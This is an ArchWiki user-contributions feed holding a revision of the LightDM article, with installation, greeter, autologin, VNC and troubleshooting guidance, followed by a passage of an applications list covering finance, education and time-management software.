https://wiki.archlinux.org/api.php?action=feedcontributions&user=Wake&feedformat=atomArchWiki - User contributions [en]2024-03-28T15:00:12ZUser contributionsMediaWiki 1.41.0https://wiki.archlinux.org/index.php?title=LightDM&diff=720885LightDM2022-03-01T22:11:43Z<p>Wake: /* See also */ Broken link</p>
<hr />
<div>[[Category:Display managers]]<br />
[[Category:Canonical]]<br />
[[de:Login-Manager#LightDM]]<br />
[[fr:LightDM]]<br />
[[ja:LightDM]]<br />
[[ru:LightDM]]<br />
{{Related articles start}}<br />
{{Related|Display manager}}<br />
{{Related|GDM}}<br />
{{Related|LXDM}}<br />
{{Related articles end}}<br />
<br />
[https://github.com/canonical/lightdm LightDM] is a cross-desktop [[display manager]]. Its key features are:<br />
<br />
* Cross-desktop - supports different desktop technologies.<br />
* Supports different display technologies (X, Mir, Wayland ...).<br />
* Lightweight - low memory usage and high performance.<br />
* Supports guest sessions.<br />
* Supports remote login (incoming - [[XDMCP]], [[VNC]], outgoing - XDMCP, [[pluggable]]).<br />
* Comprehensive test suite.<br />
* Low code complexity.<br />
<br />
More details about LightDM's design can be found [https://www.freedesktop.org/wiki/Software/LightDM/Design here].<br />
<br />
== Installation ==<br />
<br />
[[Install]] the {{Pkg|lightdm}} package.<br />
{{Tip|Stable releases are even-numbered (1.8, 1.10) while development releases are odd-numbered (1.9, 1.11). These development releases are available with {{AUR|lightdm-devel}}. Also available is {{AUR|lightdm-git}}.}}<br />
<br />
=== Greeter ===<br />
<br />
You will probably want to install a greeter. A greeter is a GUI that prompts the user for credentials, lets the user select a session, and so on. It is possible to use LightDM without a greeter, but only if an automatic login is configured; otherwise you will need to install {{pkg|xorg-server}} and one of the greeter packages below.<br />
<br />
The official repositories contain the following greeters:<br />
<br />
* {{Pkg|lightdm-gtk-greeter}}: This is the '''default''' greeter LightDM attempts to use, unless configured otherwise.<br />
* lightdm-deepin-greeter ({{Pkg|deepin-session-shell}}): A greeter from the [[Deepin]] project.<br />
* {{Pkg|lightdm-pantheon-greeter}}: A greeter from the elementary OS project.<br />
* {{Pkg|lightdm-slick-greeter}}: A GTK based greeter focused more on appearance than {{Pkg|lightdm-gtk-greeter}}, forked from {{AUR|lightdm-unity-greeter}}, and default in Linux Mint.<br />
* {{Pkg|lightdm-webkit2-greeter}}: A greeter that uses Webkit2 for theming. It supersedes {{AUR|lightdm-webkit-greeter}}.<br />
* {{Pkg|lightdm-webkit-theme-litarvan}}: A modern and full-featured Webkit2 LightDM theme.<br />
<br />
Other alternative greeters are available in the [[AUR]]:<br />
<br />
* {{AUR|lightdm-unity-greeter}}: The greeter used by Unity.<br />
* {{AUR|lightdm-mini-greeter}}: A minimal, configurable, single-user greeter.<br />
* {{AUR|lightdm-webkit-theme-aether}}: A sleek, straightforward Arch Linux themed login screen written on lightdm and the lightdm-webkit2-greeter.<br />
* {{AUR|lightdm-elephant-greeter-git}}: A small and simple greeter that runs in the {{Pkg|cage}} Wayland compositor per default.<br />
<br />
You can set the default greeter by changing the {{ic|[Seat:*]}} section of the LightDM configuration file, like so:<br />
<br />
{{hc|/etc/lightdm/lightdm.conf|2=<br />
[Seat:*]<br />
...<br />
greeter-session=lightdm-''yourgreeter''-greeter<br />
...<br />
}}<br />
<br />
One way to check which greeters are available is to list the files in the {{ic|/usr/share/xgreeters}} directory; each ''.desktop'' file represents an available greeter. In this example, the {{ic|lightdm-gtk-greeter}} and {{ic|lightdm-webkit2-greeter}} greeters are available:<br />
<br />
$ ls -1 /usr/share/xgreeters/<br />
lightdm-gtk-greeter.desktop<br />
lightdm-webkit2-greeter.desktop<br />
<br />
== Enabling LightDM ==<br />
<br />
Make sure to [[enable]] {{ic|lightdm.service}} so LightDM will be started at boot; see also [[Display manager#Loading the display manager]].<br />
<br />
== Command line tool ==<br />
<br />
LightDM offers a command line tool, {{ic|dm-tool}}, which can be used to lock the current seat, switch sessions, etc, which is useful with 'minimalist' window managers and for testing. To see a list of available commands, execute:<br />
<br />
$ dm-tool --help<br />
<br />
=== User switching ===<br />
<br />
{{Accuracy|Is this warning inappropriate? {{ic|dm-tool lock}} and {{ic|dm-tool switch-to-greeter}} are NOT screen lockers. They only switch to the LightDM greeter and send a notification to lock the session (as {{ic|loginctl lock-session}}). This notification should be processed by a screen locker or redirected by ''xss-lock''. In the absence of a screen locker to listen, there is nothing {{ic|dm-tool ...}} can do - but that's not LightDM's fault. This issue is well known and touched upon [[List_of_applications#Screen_lockers|here]] and [[XScreenSaver#Lock_on_suspend|here]].}}<br />
<br />
{{Warning|1=The use of lightDM's built-in screen lockers like {{ic|dm-tool lock}} or {{ic|dm-tool switch-to-greeter}} are [https://bbs.archlinux.org/viewtopic.php?pid=1712213#p1712213 '''not''' recommended]. Use [[#Lock the screen using light-locker|light-locker]] or something from [[List of applications/Security#Screen lockers]].}}<br />
<br />
LightDM's ''dm-tool'' command can be used to allow multiple users to be logged in on separate ttys. The following will send a signal requesting that the current session be locked and then will initiate a switch to LightDM's greeter, allowing a new user to log in to the system.<br />
<br />
$ dm-tool switch-to-greeter<br />
<br />
== Testing ==<br />
<br />
First, [[install]] {{Pkg|xorg-server-xephyr}} from the [[official repositories]].<br />
<br />
Then, run LightDM as an X application:<br />
<br />
$ lightdm --test-mode --debug<br />
<br />
== Optional configuration and tweaks ==<br />
<br />
LightDM can be configured by modifying its configuration file, {{ic|/etc/lightdm/lightdm.conf}}.<br />
<br />
Some greeters have their own configuration files. For example:<br />
<br />
{{Pkg|lightdm-gtk-greeter}}: {{ic|/etc/lightdm/lightdm-gtk-greeter.conf}} (or you can use the {{Pkg|lightdm-gtk-greeter-settings}} gui).<br />
<br />
{{Pkg|lightdm-webkit2-greeter}}: {{ic|/etc/lightdm/lightdm-webkit2-greeter.conf}}<br />
<br />
=== X session wrapper ===<br />
<br />
{{Merge|Xprofile|Duplicated information}}<br />
<br />
If you are migrating from [[xinit]], you will notice that the display is not launched by your shell. This is because, as opposed to your shell starting the display (and the display inheriting the environment of your shell), LightDM starts your display and does not source your shell. LightDM launches the display by running a wrapper script and that finally exec's your graphic environment. By default, {{ic|/etc/lightdm/Xsession}} is run.<br />
<br />
==== Environment variables ====<br />
<br />
The script checks and sources {{ic|/etc/profile}}, {{ic|~/.profile}}, {{ic|/etc/xprofile}} and {{ic|~/.xprofile}}, in that order. If you are using a shell that does not source any of these files, you can create an {{ic|~/.xprofile}} to do so. (In this example, the login shell is [[zsh]])<br />
<br />
{{hc|~/.xprofile|2=<br />
#!/bin/sh<br />
<nowiki>[ -f ~/.config/zsh/.zshenv ] && . ~/.config/zsh/.zshenv</nowiki><br />
}}<br />
<br />
If you have shell variables that are important for your display (such as Gtk or QT themes, GNUPG location, configuration overrides, etc.) this will let your graphic environment have access to your environment without having to be launched by your login shell.<br />
<br />
==== Keymap ====<br />
<br />
The script runs [[Xkbmap]] with arguments provided in files {{ic|/etc/X11/Xkbmap}}, {{ic|~/.Xkbmap}}. If those files are not found, it runs [[xmodmap]] with {{ic|/etc/X11/Xmodmap}}, {{ic|~/.Xmodmap}}. If using xkbmap, the files are parsed using cat. The following example works<br />
<br />
{{hc|~/.Xmodmap|2=<br />
-model pc105 -layout us,us,tr -variant ,dvorak,f -option grp:caps_toggle<br />
}}<br />
<br />
Otherwise, the session inherits the system default mapping of X11. This mapping can be defined in the xorg configuration files, either manually or with {{ic|localectl set-x11-keymap}}. See [[Xorg/Keyboard configuration#Setting keyboard layout]].<br />
<br />
==== Multiple keyboard layouts in lightdm-gtk-greeter ====<br />
<br />
To enable users switch between pre-defined keyboard layouts on the log-in screen enable the drop-down menu and configure the layouts. Either use the {{Pkg|lightdm-gtk-greeter-settings}} gui or edit the configuration file directly:<br />
<br />
{{hc|/etc/lightdm/lightdm-gtk-greeter.conf|2=<br />
[greeter]<br />
indicators = ~hosts;~spacer;~clock;~spacer;~layout;~language;~session;~ally;~power<br />
}}<br />
<br />
Use [[Xorg/Keyboard_configuration#Using_localectl|localectl]] to set multiple layouts, e.g. de and its “variant” neo with the latter as primary:<br />
<br />
# localectl --no-convert set-x11-keymap de,de pc105 neo,<br />
<br />
Note the trailing comma which implies a blank variant for the second de.<br />
<br />
=== Changing background images/colors ===<br />
<br />
You can set the background to a hex color or an image. Some greeters offer more robust background options like background selection from the login screen, random backgrounds, etc.<br />
<br />
==== GTK greeter ====<br />
<br />
You can use the {{Pkg|lightdm-gtk-greeter-settings}} gui.<br />
<br />
Users wishing to customize the wallpaper on the greeter screen need to edit {{ic|/etc/lightdm/lightdm-gtk-greeter.conf}} and define the {{ic|background}} variable under the {{ic|[greeter]}} section. For example:<br />
{{hc|/etc/lightdm/lightdm-gtk-greeter.conf|2=<br />
[greeter]<br />
background=/usr/share/pixmaps/black_and_white_photography-wallpaper-1920x1080.jpg<br />
}}<br />
<br />
{{Note|It is recommended to place the PNG or JPG file in {{ic|/usr/share/pixmaps}} since the LightDM user needs read access to the wallpaper file.}}<br />
<br />
===== GTK3 Theme =====<br />
<br />
GTK3 themes can be specified with the {{ic|theme-name}} variable in the {{ic|[greeter]}} section of {{ic|/etc/lightdm/lightdm-gtk-greeter.conf}} For example, {{ic|1=theme-name=Adwaita-dark}}.<br />
<br />
==== Webkit2 greeter ====<br />
<br />
The {{Pkg|lightdm-webkit2-greeter}} allows you to choose a background image directly on the login screen. It also offers an option to display a random image each time it starts if you use the [https://github.com/artur9010/lightdm-webkit-material Material theme]. By default, images are sourced from {{ic|/usr/share/backgrounds}}. You can change the background images directory by editing {{ic|lightdm-webkit2-greeter.conf}}. For example:<br />
{{hc|/etc/lightdm/lightdm-webkit2-greeter.conf|2=<br />
[branding]<br />
background_images = /usr/share/backgrounds<br />
}}<br />
<br />
{{Note|The background images directory must be accessible to the LightDM user so it should not be located anywhere under {{ic|/home}}. }}<br />
<br />
==== Unity greeter ====<br />
<br />
Users using the {{AUR|lightdm-unity-greeter}} must edit the {{ic|/usr/share/glib-2.0/schemas/com.canonical.unity-greeter.gschema.xml}} file and then execute:<br />
<br />
# glib-compile-schemas /usr/share/glib-2.0/schemas/<br />
<br />
According to [https://bbs.archlinux.org/viewtopic.php?id=149945 this] page.<br />
<br />
==== Slick Greeter ====<br />
<br />
Use the {{AUR|lightdm-settings}} GUI<br />
<br />
=== Changing your avatar ===<br />
<br />
First, make sure the {{Pkg|accountsservice}} package from the [[official repositories]] is installed, then set it up as follows, replacing {{ic|''username''}} with the desired user's login name.<br />
<br />
* Create the file {{ic|/var/lib/AccountsService/icons/''username''.png}} using a 96x96 PNG image file. Different image file formats are possible too, e.g., JPEG.<br />
* Alternatively, create the image file as {{ic|/home/''username''/.face}} and skip the next step if the defaults already point to the user home directory path<br />
* Edit or create the account settings file {{ic|/var/lib/AccountsService/users/''username''}}, and add the lines<br />
<br />
[User]<br />
Icon=/var/lib/AccountsService/icons/''username''.png<br />
<br />
The filename here should point to the icon created in the first step, so adjust the filename extension if necessary.<br />
<br />
{{Note|Make sure that both created files have 644 permissions, use [[chmod]] to correct them.}}<br />
<br />
=== Sources of Arch-centric 64x64 icons ===<br />
<br />
The {{AUR|archlinux-artwork}} package contains some nice examples that install to {{ic|/usr/share/archlinux/icons}} and that can be copied to {{ic|/usr/share/icons/hicolor/64x64/devices}} as follows:<br />
<br />
# find /usr/share/archlinux/icons -name "*64*" -exec cp {} /usr/share/icons/hicolor/64x64/devices \;<br />
<br />
After copying, the {{AUR|archlinux-artwork}} package can be removed.<br />
<br />
=== Enabling autologin ===<br />
<br />
Edit the LightDM configuration file and ensure these lines are uncommented and correctly configured:<br />
<br />
{{hc|/etc/lightdm/lightdm.conf|2=<br />
[Seat:*]<br />
autologin-user=''username''<br />
}}<br />
<br />
You must be part of the {{ic|autologin}} group to be able to login automatically without entering your password:<br />
<br />
# groupadd -r autologin<br />
# gpasswd -a ''username'' autologin<br />
<br />
LightDM logs in using the session specified in the {{ic|~/.dmrc}} of the user getting logged in automatically. To override this file, specify {{ic|autologin-session}} in {{ic|lightdm.conf}}:<br />
<br />
{{hc|/etc/lightdm/lightdm.conf|2=<br />
[Seat:*]<br />
autologin-user=''username''<br />
autologin-session=''session''<br />
}}<br />
<br />
The list of valid session names can be found by listing {{ic|/usr/share/xsessions/*.desktop}} for X's sessions and {{ic|/usr/share/wayland-sessions/*.desktop}} for Wayland's.<br />
<br />
{{Note|GNOME users, and by extension any gnome-keyring user will have to set up a blank password to their keyring for it to be unlocked automatically.}}<br />
<br />
=== Enabling interactive passwordless login ===<br />
<br />
LightDM goes through [[PAM]] so you must configure the lightdm configuration of PAM:<br />
<br />
{{hc|/etc/pam.d/lightdm|2=<br />
#%PAM-1.0<br />
'''auth sufficient pam_succeed_if.so user ingroup nopasswdlogin'''<br />
auth include system-login<br />
...<br />
}}<br />
<br />
You must then also be part of the {{ic|nopasswdlogin}} group to be able to login interactively without entering your password:<br />
<br />
# groupadd -r nopasswdlogin<br />
# gpasswd -a ''username'' nopasswdlogin<br />
<br />
{{Note|GNOME users, and by extension any gnome-keyring user may have to follow the instructions at the end of the previous section on enabling autologin.}}<br />
<br />
To create a new user account that logs in automatically and additionally able to login again without a password the user can be created with supplementary membership of both groups, e.g.:<br />
<br />
# useradd -mG autologin,nopasswdlogin -s /bin/bash ''username''<br />
<br />
=== Enabling guest sessions ===<br />
<br />
{{Note|A guest user has passwordless access to your system after enabling this feature.}} <br />
<br />
To enable guest sessions in LightDM (without changing your system configuration) you need at least two things:<br />
<br />
# a '''guest-account-script''': defaults to {{ic|guest-account}} and accepts two commands:<br />
#* '''add''' (to create a temporary guest system account and returns the user name of the created account)<br />
#* '''remove''' ''account name''(to delete the corresponding account)<br />
# an [[#Enabling autologin|'''autologin''']] group to which the created guest account must be added (cf. {{ic|/etc/pam.d/lightdm-autologin}})<br />
<br />
There are two AUR packages that enable guest sessions in lightdm:<br />
<br />
* {{aur|lightdm-guest}} which provides the (largely unmodified) upstream guest-session script as well as {{pkg|lightdm}} itself.<br />
* {{aur|lightdm-guest-account}} which provides only a minimal version of the script.<br />
<br />
=== Hiding system and services users ===<br />
<br />
To prevent system users from showing-up in the login, install the optional dependency {{Pkg|accountsservice}}, or add the user names to {{ic|/etc/lightdm/users.conf}} under {{ic|hidden-users}}. The first option has the advantage of not needing to update the list when more users are added or removed.<br />
<br />
=== Migrating from SLiM ===<br />
<br />
{{Merge|Display Manager|Not LightDM specific (or even SLiM specific for that matter as [[XDM]] also uses [[xinitrc]]). Perhaps this merits a one-liner somewhere on the [[Display Manager]] page?}}<br />
<br />
Move the contents of [[xinitrc]] to [[xprofile]], removing the call to start the [[window manager]] or [[desktop environment]].<br />
<br />
=== Login using ~/.xinitrc ===<br />
<br />
See [[Display manager#Run ~/.xinitrc as a session]].<br />
<br />
=== NumLock on by default ===<br />
<br />
Install the {{Pkg|numlockx}} package and then edit {{ic|/etc/lightdm/lightdm.conf}}:<br />
<br />
{{hc|/etc/lightdm/lightdm.conf|2=<br />
[Seat:*]<br />
greeter-setup-script=/usr/bin/numlockx on<br />
}}<br />
<br />
=== Default session ===<br />
<br />
Lightdm, like other DMs, stores the last-selected xsession in {{ic|~/.dmrc}}. See [[Display manager#Session configuration]] for more info.<br />
<br />
=== Adjusting the login window's position ===<br />
<br />
==== GTK greeter ====<br />
<br />
Users need to edit {{ic|/etc/lightdm/lightdm-gtk-greeter.conf}} and enter a value for the {{ic|position}} variable. It accepts {{ic|x}} and {{ic|y}} values, either absolute (in pixels) or relative (in percent). Each value can also have an additional anchor location for the window, {{ic|start}}, {{ic|center}} and {{ic|end}} separated from the value by a comma.<br />
<br />
Example:<br />
<br />
position=200,start 50%,center<br />
<br />
=== VNC Server ===<br />
<br />
Lightdm can also be used to connect to via VNC. Make sure to install {{pkg|tigervnc}} on the server side and optionally as your VNC client on the client PC.<br />
<br />
Setup an authentication password on the server as root:<br />
<br />
# vncpasswd /etc/vncpasswd<br />
<br />
Edit the LightDM configuration file as shown below. Note that {{ic|listen-address}} configures the VNC to only listen to connections from localhost. This is used to only allow connections via [[TigerVNC#On_the_client|SSH and port forwarding]]. On the SSH client, make sure that you use {{ic|localhost:5900}} for the tunnel destination; using {{ic|127.0.0.1:5900}} or {{ic|::1:5900}} is not reliable on dual stack network connections. If you want to allow insecure connections you can disable this setting.<br />
<br />
{{hc|/etc/lightdm/lightdm.conf|2=<br />
[VNCServer]<br />
enabled=true<br />
command=Xvnc -rfbauth /etc/vncpasswd<br />
port=5900<br />
listen-address=localhost<br />
width=1024<br />
height=768<br />
depth=24<br />
}}<br />
<br />
Now open an SSH tunnel and connect to localhost as described in [[TigerVNC#On the client]].<br />
<br />
{{Note|If you get a blank screen upon opening the VNC connection, try a different LightDM greeter.}}<br />
<br />
=== Lock the screen using light-locker ===<br />
<br />
{{Pkg|light-locker}} is a simple screen locker using LightDM to authenticate the user. Once installed and running, you can lock your session via:<br />
<br />
$ light-locker-command -l<br />
<br />
This requires {{ic|light-locker}} to be started at the beginning of your session. By default, this is enabled through [[XDG Autostart]]. See [[Autostarting]] for more options.<br />
<br />
=== Multiple-monitor setup ===<br />
<br />
Sometimes LightDM does not set the monitor resolution correctly on a multiple-monitor setup. The following Xorg configuration works with two monitors: a large primary screen on the left side, and a secondary smaller screen to its right. The order can be reversed and tweaked.<br />
<br />
{{hc|/etc/X11/xorg.conf.d/52-resolution-fix.conf|2=<br />
Section "Monitor"<br />
Identifier "DP1"<br />
Option "PreferredMode" "3840x2160"<br />
Option "Primary" "1"<br />
EndSection<br />
Section "Monitor"<br />
Identifier "eDP1"<br />
Option "PreferredMode" "1920x1080"<br />
Option "RightOf" "DP1"<br />
EndSection<br />
}}<br />
<br />
This makes the {{ic|display-setup-script}} tweaks from {{ic|/etc/lightdm/lightdm.conf}} redundant.<br />
<br />
== Troubleshooting ==<br />
<br />
=== Autologin does not work ===<br />
<br />
Ensure {{ic|1=autologin-user=}} in {{ic|/etc/lightdm/lightdm.conf}} contain the correct values. Trailing whitespace will cause errors.<br />
<br />
If autologin fails with a blank screen or if the login screen immediately returns, you may need to set {{ic|1=logind-check-graphical=true}}.<br />
<br />
You can also install {{AUR|lightdm-autologin-greeter-git}} for this special purpose.<br />
<br />
=== Viewing current configuration ===<br />
<br />
To view effective configuration, run:<br />
<br />
$ lightdm --show-config<br />
<br />
This will show current settings, with the configuration files these settings were read from.<br />
<br />
=== LightDM not starting and screen flashing ===<br />
<br />
If you encounter consistent screen flashing and ultimately no LightDM on boot, ensure that you have defined the greeter correctly in LightDM's configuration file. And if you have correctly defined the GTK greeter, make sure the {{ic|xsessions-directory}} (default: {{ic|/usr/share/xsessions}}) exists and contains at least one .desktop file.<br />
<br />
The same error can happen on lightdm startup if the last used session is not available anymore (eg. you last used gnome and then removed the gnome-session package): the easiest workaround is to temporarily restore the removed package. Another solution might be:<br />
<br />
# dbus-send --system --type=method_call --print-reply --dest=org.freedesktop.Accounts /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetXSession string:xfce<br />
<br />
This example sets the session "xfce" as default for the user 1000.<br />
<br />
=== Wrong locale displayed ===<br />
<br />
In case of your locale not being displayed correctly in Lightdm add your locale to {{ic|/etc/environment}}:<br />
<br />
LANG=pt_PT.utf8<br />
<br />
Alternatively if you want LightDM and its greeters to be in a language other than your set system locale, you can use the {{ic|1=Environment=}} option in [[Systemd#Drop-in files]].<br />
<br />
=== Unresponsive for a few minutes after startup ===<br />
<br />
You may have to download more entropy. Install and enable haveged, c.f. https://github.com/canonical/lightdm/issues/17<br />
<br />
=== Missing icons with GTK greeter ===<br />
<br />
If you are using {{Pkg|lightdm-gtk-greeter}} as a greeter and it shows placeholder images as icons, make sure valid icon themes and themes are installed and configured. Check the following file:<br />
<br />
{{hc|/etc/lightdm/lightdm-gtk-greeter.conf|2=<br />
[greeter]<br />
theme-name=mate # this should be the name of a directory under /usr/share/themes/<br />
icon-theme-name=mate # this should be the name of a fully featured icons set directory under /usr/share/icons/<br />
}}<br />
<br />
=== LightDM freezes on login attempt ===<br />
<br />
You may find that after entering the correct username and password and attempting to log in, LightDM freezes and you are unable to continue to the desktop. To fix the issue, reinstall the {{Pkg|gdk-pixbuf2}} package. See [https://bbs.archlinux.org/viewtopic.php?id=179031 this forum thread].<br />
<br />
=== LightDM displaying in wrong monitor ===<br />
<br />
If you are using multiple monitors, LightDM may display in the wrong one (e.g. if your primary monitor is on the right). To force the LightDM login screen to display on a specific monitor, edit {{ic|/etc/lightdm/lightdm.conf}} and change the ''display-setup-script'' parameter like this:<br />
{{hc|/etc/lightdm/lightdm.conf|2=<br />
display-setup-script=xrandr --output ''HDMI1'' --primary<br />
}}<br />
<br />
Replace ''HDMI1'' with your real monitor ID, which you can find from '''xrandr''' command output.<br />
<br />
Alternatively, if you are using the GTK greeter, you can edit {{ic|/etc/lightdm/lightdm-gtk-greeter.conf}} and add the ''active-monitor'' parameter like this:<br />
{{hc|/etc/lightdm/lightdm-gtk-greeter.conf|2=<br />
[greeter]<br />
active-monitor=0<br />
}}<br />
<br />
Replace 0 with the desired display number.<br />
<br />
=== LightDM does not appear or monitor only displays TTY output ===<br />
<br />
It may happen that your system boots so fast that LightDM service is started before your graphics drivers are properly loaded. If this is your case, you will want to add the following to your {{ic|lightdm.conf}} file:<br />
<br />
[LightDM]<br />
logind-check-graphical=true<br />
<br />
This setting will tell LightDM to wait until graphics devices are ready before spawning greeters/autostarting sessions on them.<br />
<br />
=== LightDM is running with low FPS on Intel Graphics ===<br />
<br />
See [[Intel graphics#AccelMethod]].<br />
<br />
=== Pulseaudio not starting automatically ===<br />
<br />
See [[PulseAudio#Running]].<br />
<br />
=== Long pause before LightDM shows up when home is encrypted ===<br />
<br />
Some LightDM themes try to access the user avatar located in HOME. If your HOME is encrypted, LightDM cannot access it and hangs. To prevent this from happening, you can either:<br />
<br />
* Set your avatar as explained in [[#Changing your avatar]]<br />
* for {{Pkg|lightdm-gtk-greeter}} only: {{Ic|<nowiki>hide-user-image = true</nowiki>}} in {{Ic|/etc/lightdm/lightdm-gtk-greeter.conf}}<br />
<br />
=== Boot hangs on "[ OK ] Reached target Graphical Interface." ===<br />
<br />
There is a possibility that user and group lookups fail if you modified /etc/nsswitch.conf. That happens when:<br />
<br />
* nsswitch.conf group: includes {{Ic|<nowiki>ldap</nowiki>}} without setting {{Ic|<nowiki>nss_initgroups_ignoreusers ALLLOCAL</nowiki>}} in {{Ic|<nowiki>/etc/nslcd.conf</nowiki>}}<br />
<br />
=== Wayland session not working with duplicate GNOME entries in greeter ===<br />
<br />
* Some greeters ({{Pkg|lightdm-webkit2-greeter}} for example) do not support two sessions with the same name [https://github.com/CanonicalLtd/lightdm/issues/16]. To check for duplicate entries:<br />
<br />
$ ls -1 /usr/share/wayland-sessions /usr/share/xsessions<br />
<br />
* Rename the duplicate entry in /usr/share/xsessions. For example:<br />
<br />
# mv /usr/share/xsessions/gnome.desktop /usr/share/xsessions/gnome.desktop.disabled<br />
<br />
=== Login always segfaults on first attempt ===<br />
<br />
Set a hostname as described in [[Network_configuration#Set_the_hostname|Network Page]]. See also {{Bug|47694}}.<br />
<br />
=== Infinite login loop ===<br />
<br />
If you get stuck in loop in which you type your correct user and password but the screen goes black and the you are back in the login after every attempt, running {{ic|rm ~/.Xauthority}} (or the stuck user's problematic {{ic|.Xauthority}}) may fix the issue.<br />
<br />
Another reason for this may be that you tried to recreate your "lightdm.conf" from scratch and your version is missing this line:<br />
<br />
session-wrapper=/etc/lightdm/Xsession<br />
<br />
In that case, lightdm tries to use "lightdm-session" as the session-wrapper which does not exist on Arch Linux.<br />
<br />
== See also ==<br />
<br />
* [https://wiki.ubuntu.com/LightDM Ubuntu Wiki article]<br />
* [[Gentoo:LightDM]]<br />
* [https://launchpad.net/lightdm Launchpad Page] obsolete<br />
* https://wiki.ubuntu.com/MattFischer<br />
* [https://github.com/CanonicalLtd/lightdm LightDM on GitHub]</div>Wakehttps://wiki.archlinux.org/index.php?title=List_of_applications/Other&diff=514599List of applications/Other2018-03-23T19:02:04Z<p>Wake: /* Time management */ Add pcal. Alphabetize console section.</p>
<hr />
<div><noinclude><br />
[[Category:Applications]]<br />
[[es:List of applications/Other]]<br />
[[it:List of applications/Other]]<br />
[[ja:アプリケーション一覧/その他]]<br />
[[ru:List of applications/Other]]<br />
[[zh-hans:List of applications/Other]]<br />
[[zh-hant:List of applications/Other]]<br />
{{List of applications navigation}}<br />
</noinclude><br />
== Others ==<br />
<br />
=== Finance ===<br />
<br />
See also [[Wikipedia:Comparison of accounting software]].<br />
<br />
* {{App|Beancount|A double-entry bookkeeping computer language that lets you define financial transaction records in a text file, read them in memory, generate a variety of reports from them, and provides a web interface.|http://furius.ca/beancount/|{{AUR|beancount-hg}}}}<br />
* {{App|esniper|Simple, lightweight tool for [[Wikipedia:Auction_sniping|sniping]] eBay auctions.|http://esniper.sourceforge.net/|{{AUR|esniper}}}}<br />
* {{App|[[Wikipedia:GnuCash|GnuCash]]|Financial application that implements a double-entry book-keeping system with features for small business accounting.|http://www.gnucash.org/|{{AUR|gnucash}}}}<br />
* {{App|Grisbi|Personal finance system which manages third party, expenditure and receipt categories, as well as budgetary lines, financial years, and other information that makes it suitable for associations.|http://www.grisbi.org/|{{AUR|grisbi}}}}<br />
* {{App|[[Wikipedia:HomeBank|HomeBank]]|Easy to use finance manager that can analyse your personal finance in detail using powerful filtering tools and graphs.|http://homebank.free.fr/|{{Pkg|homebank}}}}<br />
* {{App|[[Wikipedia:KMyMoney|KMyMoney]]|Personal finance manager that operates in a similar way to [[Wikipedia:Microsoft Money|Microsoft Money]]. It supports different account types, categorisation of expenses and incomes, reconciliation of bank accounts and import/export to the “QIF” file format.|http://kmymoney2.sourceforge.net/index-home.html|{{Pkg|kmymoney}}}}<br />
* {{App|[[Ledger]]|Ledger is a powerful, double-entry accounting system that is accessed from the UNIX command-line.|http://ledger-cli.org/|{{Pkg|ledger}}}}<br />
* {{App|hledger|An accounting program for tracking money, time, or any other commodity, using double-entry accounting and a simple, editable file format. hledger is inspired by and largely compatible with ledger.|http://hledger.org/|{{AUR|hledger-git}}}}<br />
* {{App|Manager Accounting|Manager is free accounting software for small business.|http://www.manager.io/|{{AUR|manager-accounting}}}}<br />
* {{App|Money Manager EX|An easy-to-use personal finance suite|http://www.moneymanagerex.org/|{{Pkg|moneymanagerex}}}}<br />
* {{App|Skrooge|Personal finances manager for the KDE desktop.|http://skrooge.org/|{{Pkg|skrooge}}}}<br />
* {{App|openerp|Open source erp system purely in python.|http://openerp.com/|{{AUR|openerp}}}}<br />
<br />
=== Education ===<br />
<br />
==== Flashcards ====<br />
<br />
See also [[Wikipedia:List_of_flashcard_software]].<br />
<br />
* {{App|[[Anki]]|Anki is a program which makes remembering things easy.|http://ankisrs.net/|{{AUR|anki12}} {{AUR|anki20-bin}}}}<br />
* {{App|iGNUit|Memorization aid based on the Leitner flashcard system.|http://homepages.ihug.co.nz/~trmusson/programs.html#ignuit|{{AUR|ignuit}}}}<br />
* {{App|[[Mnemosyne]]|Free flash-card tool which optimizes your learning process.|http://mnemosyne-proj.org/|{{AUR|mnemosyne}}}}<br />
<br />
==== Education management engines====<br />
<br />
* {{App|[[Moodle]]|Moodle is a open-source software learning management system.|https://moodle.org/|{{AUR|moodle}}}}<br />
<br />
==== Touch typing ====<br />
<br />
* {{App|[[KTouch]]|Touch Typing Tutor. It's a part of Plasma workspace.|https://www.kde.org/applications/education/ktouch|{{Pkg|ktouch}}, {{AUR|kdeedu-ktouch-patched}}}}<br />
* {{App|[[GNU Typist]]|GNU Typist (also called gtypist) is a universal typing tutor.|https://www.gnu.org/software/gtypist/|{{Pkg|gtypist}}, {{AUR|gtypist-single-space}}}}<br />
* {{App|[[Klavaro]]|Klavaro is libre software for teaching touch typing that intends to be keyboard and language independent.|http://klavaro.sourceforge.net/|{{Pkg|klavaro}}}}<br />
* {{App|[[tipp10]]|Intelligent typing tutor.|http://www.tipp10.com/|{{Pkg|tipp10}}}}<br />
* {{App|[[typespeed]]|Test your typing speed, and get your fingers' CPS.|http://typespeed.sourceforge.net|{{Pkg|typespeed}}}}<br />
* {{App|[[amphetype-svn]]|A layout-agnostic typing program aimed at people who don't need an on-screen keyboard.|http://code.google.com/p/amphetype/|{{AUR|amphetype-svn}}}}<br />
* {{App|[[dvorak7min]]|dvorak7min is a simple ncurses-based typing tutor for those trying to become fluent with the Dvorak keyboard layout.|http://packages.debian.org/unstable/games/dvorak7min|{{AUR|dvorak7min}}}}<br />
* {{App|[[dvorakng]]|A Dvorak typing tutor. It's heavily based on Dvorak7min, but adds many improvements.|https://gitlab.com/atsb/dvorakng|{{AUR|dvorakng}}}}<br />
* {{App|[[psani-profi]]|Program that will teach you touchtyping (czech).|http://www.sallyx.org/sally/psani-vsemi-deseti/|{{AUR|psani-profi}}}}<br />
* {{App|[[touchtyper]]|typing trainer - an application suite for training and exercising touchtyping.|http://typingtrainer.sourceforge.net/|{{AUR|touchtyper}}}}<br />
* {{App|[[tpgt]]|A ncurses-based typing trainer program.|http://szit.hu/tpgt/|{{AUR|tpgt}}}}<br />
* {{App|[[tuxtype]]|An educational typing tutorial game starring Tux.|http://tux4kids.alioth.debian.org/|{{AUR|tuxtype}}}}<br />
* {{App|[[typingtest-git]]|A typing test program desktop program with customizability.|https://github.com/laelath/typingtest|{{AUR|typingtest-git}}}}<br />
<br />
=== Time management ===<br />
<br />
==== Console ====<br />
<br />
* {{App|Calcurse|Text-based ncurses calendar and scheduling system (supports CalDAV)|http://calcurse.org/|{{Pkg|calcurse}}}}<br />
* {{App|DevTodo|Is a small command line application for maintaining lists of tasks.|http://swapoff.org/devtodo1.html|{{AUR|devtodo}}}}<br />
